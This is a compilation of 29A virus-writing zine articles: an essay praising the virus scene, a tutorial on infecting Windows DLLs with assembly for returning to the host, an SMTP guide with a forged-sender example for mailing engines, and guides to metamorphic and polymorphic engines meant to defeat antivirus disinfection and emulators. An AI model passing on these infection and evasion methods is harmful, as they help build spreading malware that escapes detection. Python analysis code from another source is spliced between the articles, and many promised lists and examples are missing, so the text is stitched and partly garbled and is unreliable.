Another stoned article about vx scene? Yep, the second one :-) To beginnerz I
still have something to say. I really l0ve vx scene, becoz it bringz to my life
many happy momentz...
┌─────────────┐
│ What'sa go? │
└─────────────┘
In this capitalistic world, where the "rich" is everyone who has money, "smart"
whoever has white skin and lives in the USA, and "weird" and prosecuted the one
who does not agree with this kinda "humanity", it is unbelievable that there can
exist any other world, where money, color of skin and nationality do not mean
anything...
I'm human from blood and bonez. Like everybody. When I entered the VX scene, I was
mentally young. I had many expectationz and ideaz of many thingz. But as
life went on, I changed many pointz of view... many ideaz. I started to
think about the sense of life. The sense of life is imho not about having money,
having a well-paid job, an expensive car and being a member of a yacht club. The
sense of life is to make life itself happy for you. Everything is relative
to the viewpoint you are looking from...
I believe the world is a personal thing. Everybody perceives the world in another
way... if you do what you like, the world becomes better. Better for you.
Maybe you will say "better for you, but not better for otherz". False.
What is the universe? What is the world? What is wrong and what is right? It's
individual. If you like to code viruses and you don't cause damage to otherz,
if it is your fun and if you are happy when you code viruses, there's no
better thing to do than continue with it. If you like to help other ppl, if
you will be happy when you are doing it, then do it. After all, when you
lie on your deathbed, "noone" will ask you how much money you have earned,
how many people you pushed yer own ideaz on or how many children you have made.
The "noone" will ask you if you think you lived well or not.
Finally, as life goes on, I'm thinking about the past, about the present
and the future... I've found out that the best I can do is do what I like to do.
The world will change for the better if you change for the better... Becoz what is
the world? The world is what you can see... And if you become happy, if you
do what you really, but really like to do, the world will be better.
Sometimez, people can't find the real sense of life becoz they have no choicez.
Some ppl, working in some big company, have as their sense of life to wake up early,
go to work, then to the pub and home. Every day the same. Do you think they are
happy? I don't think so. But that's their problem... if they don't find out
that something is wrong, they won't ever find the real sense of life. But if
someone thinks that something is wrong with them, it's the start of a big
journey. Don't become a lost existence.
My advice is: explore your own mind. Open your mind to yourself. Think about
yourself. Find what you like to do, becoz you live here only once, work
is not everything. The world will be what you make it. Try to
be happy with little thingz... be happy with yourself. Trust yourself. Love
yourself (but don't be an egoist). But you have to mean it seriously, truly and
you have to believe it from your heart. Do the right thingz - do what you like
to do, do what makes you happy, coz if you are happy with your life, the
world will be happy with you...
My own, happy world, where I am exactly the one who I really am, is the VX
scene. The coding of artificial life. Being with real friendz and making real
thingz. And which is your own happy world?
┌─────────────┐
# Benny / 29A └───────────┐
@ benny_29a@privacyx.com  │
@ http://benny29a.cjb.net │
└─────────────────────────┘
─────────────────────────────────────────────────────
Considerations Infecting 32bits Libraries For Windows
─────────────────────────────────────────────────────
by Bumblebee/29a
Introduction
────────────
People think PE DLL files are the same as PE EXE files, but this is
not 100% right. The format is the same, but not the way the files
work. I noticed that while coding DLL infectors ;)
This is a little article that shows you some tips you must take into
account while infecting this kind of PE file.
What is a DLL?
──────────────
In the first place, don't think DLLs are only files with the DLL extension.
In your system there are different extensions that hide DLLs: CPL, AX,
ACM, ...
Let me lift this little description of DLLs from the Win32 SDK:
Considerations
──────────────
The first point we get from the description tells us the DLL will be
relocated very often. We must assume this will ALWAYS happen. So we cannot
rely on jumps to DLLEP (host entry point) to return control to the infected
program. We need to relocate this address. A nice way to do it could be:
lea esi,virusBegin+ebp
sub esi,dword ptr [calculatedVirusBegin+ebp]
add dword ptr [DLLEP+ebp],esi
virusBegin -> where the virus starts to run
calculatedVirusBegin -> EP calculated for the virus in the infection
process.
DLLEP -> old entry point
Let's imagine we infect a DLL whose image base is 70000000h and whose DLLEP
is 7000d000h (Entry Point + Image Base). We put our virus at the end of the
last section, at address 7001e000h (RVA 0001e000h). We patch the header and
set the entry point to 0001e000h. At this point we save our calculated EP and
the old DLLEP (7001e000h and 7000d000h). Later, when this DLL is executed,
our virus does its work and needs to return to the original code. But
we cannot rely on the DLL being loaded at 70000000h, so we cannot jump to
7000d000h (old EP). Now the previous code rules. You get your current
EP by way of the delta offset (in ebp in the example). Then you
subtract the supposed virus EP (7001e000h) and you get the displacement
to apply to the DLLEP. This is simple and could be done in several ways.
But this first point gives us more things to think about. The DLL uses
some things from the caller's environment:
Now let's go to the second point. The fact that several applications can
use the same DLL requires the DLL to have a way to manage that. The
DLLEP has the following special structure:
HINSTANCE hinstDLL -
This is a handle to the DLL.
DWORD fdwReason -
This is a flag that tells the DLL why DLLEP is being called. This is a very
important point. It indicates one of the following:
LPVOID lpvReserved -
Indicates some parameters for DLL initialization and cleanup.
As you can see fdwReason is very important and shows us a very, very
important point: the DLLEP could be (and will be) called more than
once.
You must take this into account. Your virus will be called more than
once, and in encrypted viruses this can really fuck things up. In non-encrypted
viruses there is no problem in the first instance. But... what happens if
your decryptor runs twice? hehehe.
We could get rid of this problem by patching the virus to return to the host
if it is called more than once, or by verifying that the virus is already
decrypted so as not to do it again. Work it out yourself.
Lastly, they can share code. No problem. There is nothing there
you cannot check in the section properties.
But experience gave me other points. It's possible for a DLL to have
NO CODE! Imagine what happens if you infect a DLL that only has
resources ;) This is easy to check: just verify that the code base is not
equal to zero, for example.
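The same header facts (a relocatable DLL, an entry point moved to the end of the last section, a DLL with no code at all) are what a scanner's triage looks for. As an added example that is not part of this article or of 29A's code, the Python below parses PE32 headers and flags an entry point outside the code section or in the last section (exactly where the worked example above puts it), a zero BaseOfCode (the author's resource-only check) and a missing relocation table; the sample images are constructed in memory by build_image(), so nothing is read from disk.

```python
import struct

# PE constants (from the PE/COFF specification).
IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
PE32_MAGIC = 0x10B
OPT_HEADER_SIZE = 0xE0        # PE32 optional header with 16 data directories
BASERELOC_DIR = 5             # index of the base relocation data directory


def build_image(entry_rva, base_of_code, sections, reloc_rva=0x20000):
    """Constructed header-only PE32 DLL with image base 70000000h, as in
    the article's example. sections: (name_bytes, rva, virtual_size, flags)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0,
                       OPT_HEADER_SIZE, IMAGE_FILE_DLL)
    opt = bytearray(OPT_HEADER_SIZE)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<II", opt, 16, entry_rva, base_of_code)
    struct.pack_into("<I", opt, 28, 0x70000000)                 # ImageBase
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * BASERELOC_DIR,
                     reloc_rva, 0x100 if reloc_rva else 0)
    table = b"".join(struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize,
                                 rva, vsize, 0, 0, 0, 0, 0, flags)
                     for name, rva, vsize, flags in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


def parse_pe(image):
    """Pull the header fields the checks need out of a PE32 image."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[:2] != b"MZ" or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    _, nsect, _, _, _, opt_size, file_flags = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    if struct.unpack_from("<H", image, opt)[0] != PE32_MAGIC:
        raise ValueError("only PE32 is handled here")
    entry, base_of_code = struct.unpack_from("<II", image, opt + 16)
    reloc_rva, reloc_size = struct.unpack_from("<II", image, opt + 96 + 8 * BASERELOC_DIR)
    sections = []
    for i in range(nsect):
        name, vsize, rva, *_, flags = struct.unpack_from("<8sIIIIIIHHI", image,
                                                         opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "rva": rva,
                         "vsize": vsize, "flags": flags})
    return {"is_dll": bool(file_flags & IMAGE_FILE_DLL), "entry": entry,
            "base_of_code": base_of_code, "sections": sections,
            "relocatable": reloc_rva != 0 and reloc_size != 0}


def section_of(pe, rva):
    """Section whose virtual range contains rva, or None."""
    for sec in pe["sections"]:
        if sec["rva"] <= rva < sec["rva"] + sec["vsize"]:
            return sec
    return None


def triage(image):
    """Return the findings for one image; an empty list means nothing stood out."""
    pe = parse_pe(image)
    findings = []
    if pe["is_dll"] and not pe["relocatable"]:
        findings.append("DLL carries no base relocations")
    if pe["base_of_code"] == 0:                    # the article's resource-only check
        findings.append("BaseOfCode is zero: resource-only DLL")
    if pe["entry"] == 0:
        return findings                            # no DllMain to look at
    sec = section_of(pe, pe["entry"])
    if sec is None:
        findings.append("entry point outside every section")
        return findings
    if not sec["flags"] & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE):
        findings.append("entry point in non-code section " + sec["name"])
    if len(pe["sections"]) > 1 and sec is pe["sections"][-1]:
        findings.append("entry point in last section " + sec["name"])
    return findings


# Constructed samples with the article's numbers: original entry point RVA
# d000h inside .text, and a patched one at RVA 1e000h at the end of the last section.
TEXT = (b".text", 0x1000, 0x10000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)
DATA = (b".data", 0x11000, 0xE000, IMAGE_SCN_CNT_INITIALIZED_DATA)
RSRC = (b".rsrc", 0x1000, 0x4000, IMAGE_SCN_CNT_INITIALIZED_DATA)
CLEAN_DLL = build_image(0xD000, 0x1000, [TEXT, DATA])
PATCHED_DLL = build_image(0x1E000, 0x1000, [TEXT, DATA])
RESOURCE_DLL = build_image(0, 0, [RSRC])
PATCHED_RESOURCE_DLL = build_image(0x3000, 0, [RSRC])
```

Run triage() over each of the four constants to see which of the header conditions each one trips.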
Last words
──────────
I find DLL infection very useful and not very complex if you take care
of some points. And now with this article you can ;)
Most programs do all their work in DLLs and the main EXE file is
only there for the GUI. So DLL infection with per-process residency is a
great choice.
I hope you've found this article interesting.
INDEX
1. Overview
2. Syntaxis
3. Client messages
4. Server messages
5. Practice
6. Experience
1. Overview
───────────
This little guide explains how to send a mail using this protocol
and some tricks you can use in the process. Most of this
information can be found in the Internet RFC 821. Moreover, there are
some tips you can only get from experience. This is a guide, and
the full information on the protocol is not provided, only what is
needed to send a mail successfully.
2. Syntaxis
───────────
Client messages:
HELO [host][CRLF]
MAIL FROM:[address][CRLF]
RCPT TO:[address][CRLF]
DATA[CRLF]
[multi-line]
[CRLF].[CRLF]
QUIT[CRLF]
Server responses:
Some particular ones:
220<string>[CRLF] := Service ready
250<string>[CRLF] := Requested action okay
221<string>[CRLF] := Closing transmission
251<string>[CRLF] := Forwarding mail
354<string>[CRLF] := Start mail input
3. Client messages
──────────────────
HELO [host][CRLF]
MAIL FROM:[address][CRLF]
RCPT TO:[address][CRLF]
DATA[CRLF]
[multi-line]
[CRLF].[CRLF]
QUIT[CRLF]
This is used to close the session with the server. This
command ends with disconnection and with the 221 response.
Notice that several servers wait until you close the session
to process the mail, to make sure you closed the session the
right way and did not drop the connection in a dirty way.
4. Server messages
──────────────────
5. Practice
───────────
SMTP servers listen on port 25. So you can connect with:
telnet smtp.server.dom 25
Try with a server that has SMTP. Most web-based mail systems have
an address different from the one you use to send mail, so this might
not be a good idea. But test it by simply connecting to port 25. Try
with mail.hotmail.com (not www.hotmail.com, because that one is for HTTP),
but I'm not sure if it will work.
We are going to assume you connected without problems. Let's use
C for the client and S for the server. This could be your session:
C: MAIL FROM:<bumblebee@microsoft.com>
S: 250 OK
C: RCPT TO:<support@avp.com>
S: 251 User not local; will forward to support@avp.com
C: DATA
S: 354 Start mail input; end with <CRLF>.<CRLF>
C: Hi AVP people!
C: Are you Anti Viral Perverts?
C: .
S: 250 OK
C: QUIT
S: 221 SMTP.SERVER.DOM Service closing transmission channel
Simple, isn't it? Make different tests. Now you only need to code
your own engine!
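The exchange above can also be checked mechanically, which is what a mail gateway log reviewer does with such sessions. As an added example (not the article's or 29A's code), this Python state machine walks a C:/S: transcript like the one in section 5, verifies each reply code against the table in section 2, and extracts the envelope; it also handles the multi-line "250-" reply form of RFC 821, which the guide does not mention. Both transcripts are constructed sample input.

```python
import re

# Reply codes from section 2, keyed by the client command that draws them;
# the lone "." ending DATA is answered like a command, with 250.
EXPECTED = {"HELO": {250}, "MAIL": {250}, "RCPT": {250, 251},
            "DATA": {354}, ".": {250}, "QUIT": {221}}
ADDR_RE = re.compile(r"<([^>]*)>")

# The session from section 5 with a greeting and HELO in front of it
# (constructed sample input, not a capture); the HELO reply is split over
# two lines to show the "250-" continuation form of RFC 821.
SAMPLE_SESSION = """\
S: 220 SMTP.SERVER.DOM Service ready
C: HELO client.example.net
S: 250-SMTP.SERVER.DOM greets client.example.net
S: 250 OK
C: MAIL FROM:<bumblebee@microsoft.com>
S: 250 OK
C: RCPT TO:<support@avp.com>
S: 251 User not local; will forward to support@avp.com
C: DATA
S: 354 Start mail input; end with <CRLF>.<CRLF>
C: Hi AVP people!
C: Are you Anti Viral Perverts?
C: .
S: 250 OK
C: QUIT
S: 221 SMTP.SERVER.DOM Service closing transmission channel
"""

# Same opening, but the recipient is rejected and the client pushes on anyway.
REJECTED_SESSION = """\
S: 220 SMTP.SERVER.DOM Service ready
C: HELO client.example.net
S: 250 OK
C: MAIL FROM:<bumblebee@microsoft.com>
S: 250 OK
C: RCPT TO:<nobody@avp.com>
S: 550 No such user here
C: DATA
S: 554 No valid recipients
"""


def check_session(transcript):
    """Walk a C:/S: transcript against the section 2 grammar; return the
    envelope, body line count, whether 221 closed it, and protocol errors."""
    result = {"from": None, "to": [], "body_lines": 0, "closed": False,
              "errors": []}
    greeted = in_data = False      # 220 seen / between 354 and the final "."
    pending = None                 # client command still waiting for a reply
    for raw in transcript.splitlines():
        who, _, line = raw.partition(": ")
        if who == "S":
            m = re.match(r"(\d{3})([ -]|$)", line)
            if not m:
                result["errors"].append("malformed reply: " + line)
                continue
            code = int(m.group(1))
            if m.group(2) == "-":            # more lines of this reply follow
                continue
            if not greeted:
                greeted = True
                if code != 220:
                    result["errors"].append("greeting was %d, not 220" % code)
                continue
            if pending is None:
                result["errors"].append("unsolicited reply %d" % code)
            elif code not in EXPECTED[pending]:
                result["errors"].append("%s answered with %d" % (pending, code))
            elif pending == "DATA":
                in_data = True
            elif pending == "QUIT":
                result["closed"] = True
            pending = None
        elif who == "C":
            if in_data:                      # body lines are not commands
                if line == ".":
                    in_data, pending = False, "."
                else:
                    result["body_lines"] += 1
                continue
            if pending is not None:
                result["errors"].append("%s sent before reply to %s" % (line, pending))
            verb = line.split(" ", 1)[0].upper()
            if verb not in EXPECTED or verb == ".":
                result["errors"].append("unknown command " + verb)
                continue
            addr = ADDR_RE.search(line)
            if verb == "MAIL":
                result["from"] = addr.group(1) if addr else None
            elif verb == "RCPT":
                result["to"].append(addr.group(1) if addr else None)
            pending = verb
    if in_data:
        result["errors"].append("DATA never terminated with '.'")
    return result
```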
6. Experience
─────────────
There are some things the official documentation doesn't say and
that you must take into account to avoid problems:
That's all. I hope you've found this article interesting and useful.
───────────────────────────────────────────────────────────────────────────
(disclaimer)
───────────────────────────────────────────────────────────────────────────
█▀▀▀▀▀▀▀▀▀▀▀▀█═╗
█  Foreword  █ ║
█▄▄▄▄▄▄▄▄▄▄▄▄█ ║
 ╚═════════════╝
I hope you will enjoy this article. If so, please drop me a note at
my e-mail address: lordjulus@geocities.com. I am always ready to hear new
info and theories.
█▀▀▀▀▀▀▀▀▀▀█═╗
█  Basics  █ ║
█▄▄▄▄▄▄▄▄▄▄█ ║
 ╚═══════════╝
Literally, the term "metamorphism" is wrongly used in relation to
code. By the definition given in Webster's, "metamorphism" means the
following: "change in the mineralogical, structural, or textural composition
of rocks under pressure, heat, chemical action, etc., which turns limestone
into marble, granite into gneiss, etc."
Basically all the above values are stored inside your code at a
certain address. Things like these are most common:
OldEip dd 0
...
mov dword ptr [ebp+OldEip], eax
The human will look at your code and when he finally locates and
understands the above lines, he will program his automatic code to look at
the address of OldEip and get the value from there. There's no need for
human interference when scanning for such a simple thing. Now the software
has located the original EIP of the infected program and can safely remove
your hook just by restoring it. This is just a very simple way of
disinfecting.
█▀▀▀▀▀▀▀▀▀▀▀▀█═╗
█  Methods   █ ║
█▄▄▄▄▄▄▄▄▄▄▄▄█ ║
 ╚═════════════╝
Let's imagine that you replace the above codings with this:
OldEip1 dd 0
...
OldEip2 dd 0
...
OldEip3 dd 0
Where does it lead? Every time the virus propagates, the place where
the old entrypoint is stored will be different... And also, the instruction
that accesses it will differ from generation to generation. I don't know if
you realise the strength of this thing. Of course it is easily beatable by
locating the access instruction itself and getting the address from there.
But, think of this:
Oldeip1 dd 0
...
Oldeip2 dd 0
...
...
codeaddress1 dd 0
...
codeaddress2 dd 0
...
...
Now, the two instructions both look like this when debugged:
mov [ebp+XXXXXXX], eax
You will say, no problem... if one can locate the metamorphic engine
he can decipher your code... Think so? Read further on about the implementation
of the engine. Now let's check some other ways of using metamorphism.
This is a little bit tricky and you have to learn a little about
instruction lengths. It's not very hard, but you will have to create it by
testing it many times under a debugger. Remember that here you are not
generating a polymorphic decryptor (where you have an empty buffer and you
can fill it downwards), but you are working in compiled code that has a
definitive size and links all over. The idea is to modify a certain
instruction so that it cannot be located easily.
For this you will need to save some space in different parts of your
code and they should look somehow like a subroutine:
place1 proc
space1 db 20 dup(90h)
ret
place1 endp
You can have, let's say, around 10 places for each part of
metamorphic code. Whenever this instruction is to be called you must
rearrange the call to it. Imagine for the above:
call place1
...
place1 proc
mov [ebp+OldEip1], eax
ret
place1 endp
This is the first idea: your instruction can roam around the code.
Think that you can have, let's say, 15 places like that and 10 or more
instructions to metamorph. Your random number generator will choose a place
for each one and you will still have some left to fill with junk.
Here you need to take care of the instruction length. As you noticed,
I randomly chose the size of a place to be 20 bytes (btw: you may have
different place sizes). This means that you cannot put an instruction or
group of instructions there longer than 20 bytes, because otherwise they
will overwrite the code that follows.
Now, your random number generator will choose one of the above
instructions and will simply fill in its place. What does this bring? It
makes it even harder for the automatic scanner (provided that it can look up
all the places) to know which address you are addressing (oldeip1, 2,
etc...).
█▀▀▀▀▀▀▀▀▀▀▀▀█═╗
█  Briefing  █ ║
█▄▄▄▄▄▄▄▄▄▄▄▄█ ║
 ╚═════════════╝
For the moment let's take a break and see what all the above can
generate:
call placeX
    |
    +--> place1 | place2 | place3 | place4 | place5 | place6 | place7 | place8 | place9
                                            |
                                            +--> i1 | i2 | i3 | i4
                                                        |
                                                        +--> Address1 | Address2 | Address3 | Address4 | Address5
Basically any route that goes downward can be generated by the
metamorphic process (for example a call to place5, with instruction set i1
that accesses address Address5). Almost all places and Addresses should be
used, each one for a different instruction. The instruction set should be
wider, because for each different instruction we must metamorph the specific code.
But the places and the addresses can be common to all instructions.
Of course, I don't have to say that the locations of the places and of
the addresses should be as mangled as possible inside the real code.
█▀▀▀▀▀▀▀▀▀▀▀▀█═╗
█  Advanced  █ ║
█▄▄▄▄▄▄▄▄▄▄▄▄█ ║
 ╚═════════════╝
Now let's move to a deeper thing. Imagine that there exists a really,
really masochistic person who realised the way your code behaves and he
wants to find all the addresses where your code stores the EIP (in order to
properly disinfect the victims). He could, for example, generate 500 samples
of your code and have 10 people analyze them. It wouldn't be very hard; all
they would need would be a table to be filled in with the offsets for the
places, the addresses and where to look up the address inside the instruction.
Do you think that all the situations would be met in that many generations?
Sure, if you do not use a smart slow metamorphism. This kind of slow
metamorphism would mean this: each of the three variables (place, address
and instruction set) should be changed at different moments, once a counter
has passed a value of 20. So, every 20 generations the place would change. Every
20 generations the address would change, etc. This assures us that for at least
20 generations something wouldn't change. This means that to get all the 10
possibilities for the place at least 200 generations should be created, and
every time the random number generator should produce a different number... which is
almost impossible. 200 + 200 + 200, that means 600 generations, and that with the
assumption that the randomizer generates exactly what you want. I think in
6000 generations the conditions should be hardly met. To analyze 6000
generations is... well, at least suicidal...
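The counting argument above can be made precise from the analyst's side. As an added example (not the article's code), these Python functions compute the article's floor (every re-draw yields a fresh value), the expected number of generations when the value is chosen uniformly at random (the coupon-collector result: n·H(n) draws, each lasting one 20-generation period), and a seeded simulation for several variables re-drawing in parallel. The figures 10 options and a period of 20 are the article's; the option counts for the other variables in the simulation are assumed.

```python
import random


def floor_generations(options, period):
    """The article's lower bound: every re-draw produces a value not seen
    before, so n options need n * period generations (10 * 20 = 200)."""
    return options * period


def expected_generations(options, period):
    """Expected generations under a uniform random choice: the coupon
    collector needs n * H(n) draws on average, each one lasting `period`
    generations (about 586 for 10 options and a period of 20)."""
    harmonic = sum(1.0 / k for k in range(1, options + 1))
    return options * harmonic * period


def simulate_generations(options, period, rng=None, seed=1):
    """One lineage: the generation at which the last unseen value shows up.
    Seeded by default so the result is reproducible."""
    rng = rng or random.Random(seed)
    seen, generation = set(), 0
    while len(seen) < options:
        seen.add(rng.randrange(options))
        generation += period
    return generation


def mean_generations_all_variables(option_counts, period, trials=2000, seed=1):
    """Several variables (assumed here: 10 places, 10 instruction sets and
    5 addresses) re-draw in parallel, so the analyst is done when the slowest
    one has been fully observed: the mean over trials of that maximum."""
    rng = random.Random(seed)
    total = 0
    for _ in range(trials):
        total += max(simulate_generations(n, period, rng) for n in option_counts)
    return total / trials
```

Comparing floor_generations(10, 20) with expected_generations(10, 20) shows how far the 200-generation floor sits from the typical case.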
Let's assume that you made your code metamorphize the instruction:
into a "call place", with all the links presented above. And let's
imagine that this instruction will appear 5 times in your code (maybe a few
times only as decoy). It wouldn't be very nice to encode it everytime by a
call to place. The use of a Madness Jump Table would solve this.
Here goes:
No matter what instruction you start with, you wind up at the same
address: place (note that the call place was replaced by a jmp place, because
the call is already done from the beginning and we don't want two addresses
on the stack).
Now, please look carefully at the above table. Imagine that in each
tree block you mangle the left side (the jumps) among themselves completely
at random. Does anything happen? No, because anyway the trace will still lead
to the same place. But you will have 5 instructions that will each jump
through 6 different jump places every time, every time reaching a different
place, where a different set of instructions is applied in order to use a
value which is stored in a different place, which is absolutely necessary
for the run of the program... Did you compile what I just said?
Will this decrease the speed of your code? Not at all... Will it
increase its size? Sure, a little, but not that much. 20 jumps and calls in
total means 100 bytes, plus 20 bytes per instruction set (provided we have
10 instruction sets), gives another 200. So, a total of 300 bytes added to
your code on the functional side. Plus the additional space taken by the address
storage and the instruction set storage.
█▀▀▀▀▀▀▀▀▀▀▀▀█═╗
█  Using it  █ ║
█▄▄▄▄▄▄▄▄▄▄▄▄█ ║
 ╚═════════════╝
Where to apply?
So, let's see where the metamorphic paradigm should apply (I just
looove this kind of dirty talk... ;-):
1. original entrypoint
2. original code hunk address
3. original code encryption key
4. original code hunk length
█▀▀▀▀▀▀▀▀▀▀▀▀▀█═╗
█  Some tips  █ ║
█▄▄▄▄▄▄▄▄▄▄▄▄▄█ ║
 ╚══════════════╝
How to place all this info and not get lost in your own code?
This implies that you know exactly what you start from and you put
everything on paper. Then, the Madness Jump Table offers a very good place
for data hiding. Design the table and then put the addresses between the
jumps. You might even insert some decoys there (like 0FFh prefixes before the
jumps to make the compiled code look horrible ;-).
Encrypt the core of the metamorphic engine very well. For this I
suggest a non-linear algorithm with multiple passes (like an endless loop).
Inside the metamorphic engine use address decoys. I will not go into details
on this technique, I will only present it briefly:
Instead of saying:
say:
█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█═╗
█  How to code  █ ║
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█ ║
 ╚════════════════╝
This is the part that moves the data from one address to another. It
requires a table like this:
AddressTable:
Ahunk1:
size1 = x
_addr11 dd offset address11
_addr12 dd offset address12
...
_addr1x dd offset address1x
Ahunk2:
size2 = y
_addr21 dd offset address21
_addr22 dd offset address22
...
_addr2y dd offset address2y
...
AhunkN
...
, where each hunk is used for a specific value (like oldEip or code
address), and each addressAB represents a possible place inside the data area
where the actual value can be stored.
The engine will then parse each hunk, given its size, go to each
address (adjusted by the delta handle, of course) and fill it with either a
random value or the real value, as it decides. As soon as the address for
the real value is decided, the instruction filler should be called directly
to prevent future passes over the tables. The instruction filler tells the
instruction to address the specific address where the actual data is
placed.
InstructionTable:
Ihunk1:
__size = a
_instr11 dd offset instruction11
_byteoffset11 = 3
...
...
instruction11:
push edx
mov edx, [ebp+oldEip]
mov [edx], eax
pop edx
The first instruction is 1 byte long and the second is 6 bytes long,
and the address of oldEip is stored in the fourth byte starting from the
instruction11 address. You can simply compute these values by entering
Turbo Debugger, typing the instructions and, instead of oldEip, putting 8888888h
and seeing at which byte it starts.
This part of the engine receives the address of the data from the
address generator. It will then go to each instruction's offset and fill in,
at the proper byte offset, the address it received. Then it will choose one
of the instructions and pass its number to the place filler.
This part doesn't need another table. It will simply shuffle the
instruction sets among themselves as held in the InstructionTable, and for
the instruction to be executed (as received from the instruction filler) it
will pass this value to the jump table filler.
The jump table filler simply shuffles the jumps within each
jump block (see above) and then replaces the 'jmp place' instruction with
the proper jump to the address it received from the place filler (the
instruction to be executed). Then, for each caller it will choose a random
entry into the jump table tree and fill it in using this table:
FinalTable:
Fhunk1:
____size = 5
_call11 db offset _caller11
...
All this having been set up, your code will have somewhere inside it this
instruction:
The store-eip jump table tree will guide the call through the random
tree. It will finally reach a proc which holds one of the many
instruction sets you prepared to put a value in [ebp+oldEip], where the
oldEip address will be one of the many places you have to store this value.
█▀▀▀▀▀▀▀▀▀▀▀▀▀▀█═╗
█  Final word  █ ║
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄█ ║
 ╚═══════════════╝
┌────────────────────────────────┐
│   Lord Julus/29A (Mar.2000)    │█
└────────────────────────────────┘█
 ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
────────────────────────────────────────
Advanced polymorphic engine construction
────────────────────────────────────────
by The Mental Driller / 29A
I wrote this for win32 engines. I'm not very versed in Linux/Unix virusing,
but by modifying some words in this article (and some points in the index) it
can be extrapolated to engines for those systems.
Ú---úú .
| Index |
` úú--ÄÙ
0. Some comments
1. Making more complex polymorphic engines
1.1 Size of decryptors
1.2 Algorithmical applications
1.2.1 PRIDE technology
1.2.2 Branching technology
1.3 Internal recursivity
2. Don't give a chance to AVs
2.1 Coherent decryptor structures
2.2 Opcodes to avoid
3. Advanced garbage generation
3.1 Memory accesses
3.2 API calls
3.3 Recursive garbage functions
4. Last words
ÚÄÄÄÄÄÄ---úú .
| 0. Some Comments |
` úú--ÄÄÄÄÄÄÄÙ
This article is for those who have already written their own polymorphic
engine and want to improve their knowledge and their techniques, making a
better polymorphic engine. I have to warn you that the techniques I'm going to
explain are very time consuming (an error in the coding, however small, can
generate huge errors that aren't easy to trace back, or little errors in the
code generation that can pop up at the least expected moment).
Well, so let's go on. I've tried to make both an organized article and clear
explanations, but sometimes it can be a little hard to understand. Well,
considering that I'm not an expert in article writing, I've done what I
could ;).
ÚÄÄÄÄÄÄ---úú .
| 1. Making more complex polymorphic engines |
` úú--ÄÄÄÄÄÄÄÙ
Another thing in favour of big decryptors is that it's impossible for an
emulator to determine in a few instructions whether it's a decryptor or not,
forcing it to emulate deeply. 1 Kb of garbage before starting the decryption
should be enough, but you have to keep in mind that processors get better all
the time (faster, cheaper, etc.), and so do emulators. Garbage executes very
fast under normal execution, but it can take a good while under an emulator.
The more garbage you put in, the more time an emulator needs and the fewer
chances it has of reaching the decrypted virus, as long as you use coherent
garbage to avoid heuristic detection of "strange" instruction usage, and you
also have to maintain a good balance between quantity and quality of code
generation (putting 20 Kb of very complex garbage can slow down the initial
execution of the application, making the user notice that there is something
unusual on his/her system).
This particularity is also detected by AV emulators. The only way to hide
it is to make the accesses to that memory look random, to fool the emulator
and force it to conclude that they are part of an application's normal memory
accesses, and that's what I researched a lot until I found this formula, which
is very easy to do polymorphically. It's adapted to byte-by-byte decryption,
but I explain below how to adapt it to other sizes.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Random(Number) symbolizes a random number between 0 and Number-1 (just like³
³ the C function) ³
³ ³
³Encrypted_Data_Size = The size of encrypted part, rounded to the next power³
³ of 2 (I explain this later) ³
³InitialValue = Random(Encrypted_Data_Size) ³
³ ³
³ The formula ³
³ ----------- ³
³ Register1 = Random(Encrypted_Data_Size) ³
³ Register2 = InitialValue ³
³ Loop_Label: ³
³ Decrypt [(Register1 XOR Register2)+Begin_Address_Of_Encrypted_Data] ³
³ Register1 += Random (Encrypted_Data_Size) AND -2 ³
³ ÀÄÄÄÄÄ> Take care with this one! ³
³ Register1 = Register1 MOD Encrypted_Data_Size ³
³ Register2++ ³
³ Register2 = Register2 MOD Encrypted_Data_Size ³
³ if Register2!=InitialValue GOTO Loop_Label ³
³ GOTO Begin_Address_Of_Encrypted_Data ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
That's it! Very short, very easy to code, and very randomized. Let's see it
part by part, and I'll explain the mathematical aspects of the formula (why
it's like this and not some other way):
The first thing to consider is the fact that the size of the encrypted part
must be a power of 2. If you look at the formula, you can see that the
generated decryption address comes from a XOR between two random numbers. The
fact is that a XOR (unlike ADD, SUB, etc.) never modifies a bit higher than
the highest bit of the two numbers, which allows us to always know the upper
limit of the resulting number (always a power of 2).
Now, the registers used: Register1 is used as a modifier for Register2, and
it's a pseudo-random number every time, since we generate its initial value
randomly and we add a random number to it every loop. The work of this formula
is done by Register2, and if you look at it, you can see that Register2 is
nothing but a counter, so you can increase it or decrease it, it's up to you
(or up to the engine :). Just keep it inside the limits (between 0 and
Encrypted_Data_Size).
